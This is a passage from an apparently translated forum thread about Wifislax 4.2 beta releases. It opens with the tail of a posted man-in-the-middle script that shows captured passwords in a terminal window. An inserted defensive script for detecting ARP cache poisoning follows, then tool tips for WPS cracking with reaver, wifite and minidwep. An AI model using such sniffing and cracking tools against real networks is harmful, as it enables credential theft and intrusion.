looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.
[/spoiler]
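As an added defender-side example (not part of yamas, wifislax or the script above): the ARP cache poisoning step above works by making the victim's ARP cache map the gateway IP to another MAC. A host can spot that from its own neighbour table. The snippet below compares two constructed `ip neigh show` style snapshots (all IPs and MACs are made up for the example) and flags a gateway whose MAC changed, and any MAC that answers for more than one IP. It assumes the standard `ip neigh show` line layout (`IP dev IFACE lladdr MAC STATE`).

```shell
#!/bin/bash
# Added example, not from the posted script: detect ARP cache poisoning
# from neighbour-table snapshots. Sample data below is constructed.

# Constructed "ip neigh show" output before and after a poisoning attempt.
ARP_BEFORE='192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.10 dev wlan0 lladdr aa:bb:cc:dd:ee:01 STALE
192.168.1.20 dev wlan0 lladdr aa:bb:cc:dd:ee:02 REACHABLE'

ARP_AFTER='192.168.1.1 dev wlan0 lladdr de:ad:be:ef:00:01 REACHABLE
192.168.1.10 dev wlan0 lladdr aa:bb:cc:dd:ee:01 STALE
192.168.1.20 dev wlan0 lladdr de:ad:be:ef:00:01 REACHABLE'

# mac_of SNAPSHOT IP -> prints the MAC recorded for IP (empty if absent)
mac_of() {
    printf '%s\n' "$1" | awk -v ip="$2" \
        '$1 == ip { for (i = 1; i <= NF; i++) if ($i == "lladdr") print $(i+1) }'
}

# gateway_changed BEFORE AFTER GATEWAY_IP -> success (0) if the gateway MAC changed
gateway_changed() {
    old=$(mac_of "$1" "$3")
    new=$(mac_of "$2" "$3")
    [ -n "$old" ] && [ -n "$new" ] && [ "$old" != "$new" ]
}

# duplicate_macs SNAPSHOT -> prints every MAC claimed by more than one IP
duplicate_macs() {
    printf '%s\n' "$1" | awk \
        '{ for (i = 1; i <= NF; i++) if ($i == "lladdr") seen[$(i+1)]++ }
         END { for (m in seen) if (seen[m] > 1) print m }'
}

# report_poisoning BEFORE AFTER GATEWAY_IP -> prints alerts, returns 1 if any
report_poisoning() {
    found=0
    if gateway_changed "$1" "$2" "$3"; then
        echo "ALERT: gateway $3 MAC changed from $(mac_of "$1" "$3") to $(mac_of "$2" "$3")"
        found=1
    fi
    dups=$(duplicate_macs "$2")
    if [ -n "$dups" ]; then
        echo "ALERT: MAC(s) answering for more than one IP: $dups"
        found=1
    fi
    [ "$found" -eq 0 ]
}

# Stand-alone run: compare the two constructed snapshots.
report_poisoning "$ARP_BEFORE" "$ARP_AFTER" 192.168.1.1
```

In real use the snapshots would come from periodic `ip neigh show` captures; a static neighbour entry for the gateway (`ip neigh add ... nud permanent`) is the usual host-side mitigation once the correct MAC is known.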
-
I didn't want to get into these discussions... hahaha!! But my congratulations!! You've taken a script and improved it to this point, which is amazing!! Usuarionuevo, after the beating you've just given yourself, and geminis_demon... I think you need to upload the new beta, I'm dying to try it!!!
PS: One application I didn't see... was reaver gui!! I used to use it a lot... but if you don't think it's necessary, I'll get on with it and get my hands on command-line reaver... no big deal haha!!
-
If these guys, with the effort and enthusiasm they put into every job, were at the Olympics they'd take all the medals, but luckily for us they're here among us and asking nothing in return. Keep it up always, you're real aces >:( >:( >:( >:( cheers
-
I didn't want to get into these discussions... hahaha!! But my congratulations!! You've taken a script and improved it to this point, which is amazing!! Usuarionuevo, after the beating you've just given yourself, and geminis_demon... I think you need to upload the new beta, I'm dying to try it!!!
PS: One application I didn't see... was reaver gui!! I used to use it a lot... but if you don't think it's necessary, I'll get on with it and get my hands on command-line reaver... no big deal haha!!
teik, for reaver you can use minidwep, which has it built in, you can use wifite, which does everything on its own, or you can use the m4 gui... you have 3 options, apart from the console one, 4 options in total. ^-^
-
I'm downloading it.
Thank goodness you've gone back to 32 bits!!! Since 64 bits didn't work for me on a mega-old laptop!!!
I like doing the tests on that laptop because if something happens to it, I wouldn't get mad at my own screw-up.
Thanks guys!!
-
We're on beta 4, so download that one.
I'm on my phone too
regards
-
First of all, I apologize if I've started a thread that is already resolved; I'm not very experienced with forums. My question is that I've tried wifislax 4.2 beta 3 and 4 and I can't get my wifi network card working. It's an Aspire One laptop; the wifi indicator lights up, I can see the available networks, I enter the password I use to connect with WIN 7 and it tells me the password is wrong. If I connect it by cable the internet works fine; if I use beini 1 2 3 it works perfectly. If I use porteus it works perfectly, but on wifislax 4.2 beta 3 and 4 I've spent hours downloading files and nothing at all (broadcom 4312). Could you give me a hand? I'm one more person trying to migrate from windows to linux; I'd appreciate any help you can offer.
-
First of all, I apologize if I've started a thread that is already resolved; I'm not very experienced with forums. My question is that I've tried wifislax 4.2 beta 3 and 4 and I can't get my wifi network card working. It's an Aspire One laptop; the wifi indicator lights up, I can see the available networks, I enter the password I use to connect with WIN 7 and it tells me the password is wrong. If I connect it by cable the internet works fine; if I use beini 1 2 3 it works perfectly. If I use porteus it works perfectly, but on wifislax 4.2 beta 3 and 4 I've spent hours downloading files and nothing at all (broadcom 4312). Could you give me a hand? I'm one more person trying to migrate from windows to linux; I'd appreciate any help you can offer.
You have to pay attention to how we configure wicd.
HEX OR ASCII
WEP / WPA
PASSPHRASE
-
Having done this, it gets on the internet without problems.
I tested it on two different laptops with different broadcom and atheros chips, and everything OK 100%.
You have to pay attention to how we configure wicd.
HEX OR ASCII
WEP / WPA
PASSPHRASE
question... 1- uninstall firefox and install google chrome
2- installation of new programs
thanks in advance,
-
Having done this, it gets on the internet without problems.
I tested it on two different laptops with different broadcom and atheros chips, and everything OK 100%.
You have to pay attention to how we configure wicd.
HEX OR ASCII
WEP / WPA
PASSPHRASE
question... 1- uninstall firefox and install google chrome
2- installation of new programs
thanks in advance,
newuser, close the topic
I'm thinking that if you leave 4.2 without any bug or anything exciting to fix, the future holds this kind of question for us :P
chumpy is going to get tired of handing out scoldings and lectures ^-^
-
OK, from now on, for each beta I'll close the previous post.
BESIDES, THIS IS FOR FINDING BUGS IN THE DISTRO,
which fortunately have come up and we've fixed, hoping that nothing more serious comes up.